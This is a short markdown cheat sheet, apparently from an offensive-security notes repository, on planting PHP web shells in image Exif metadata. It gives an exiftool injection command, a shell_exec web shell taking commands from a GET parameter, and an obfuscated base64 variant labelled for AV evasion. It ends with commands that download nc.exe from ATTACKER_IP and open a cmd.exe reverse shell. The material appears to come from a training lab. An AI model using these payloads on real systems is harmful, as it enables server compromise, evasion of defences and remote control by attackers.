killchain-compendium/Exploits/Web/PHP Image Exif.md

36 lines
909 B
Markdown
Raw Normal View History

2022-11-13 22:52:30 +01:00
# PHP Payload in Image ExifData
* Test
```sh
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
```
* Build Payload with AV evasion
```sh
<?php
$cmd = $_GET["wreath"];
if (isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
```
* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
* Obfuscated code with escaped `$`
```sh
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
```
* Upload and execute commands with get parameter `?wreath=systeminfo`
## Uploading Reverse through Webshell
* Parameter for Webshell
```sh
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
```
* Trigger uploaded netcat
```sh
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
```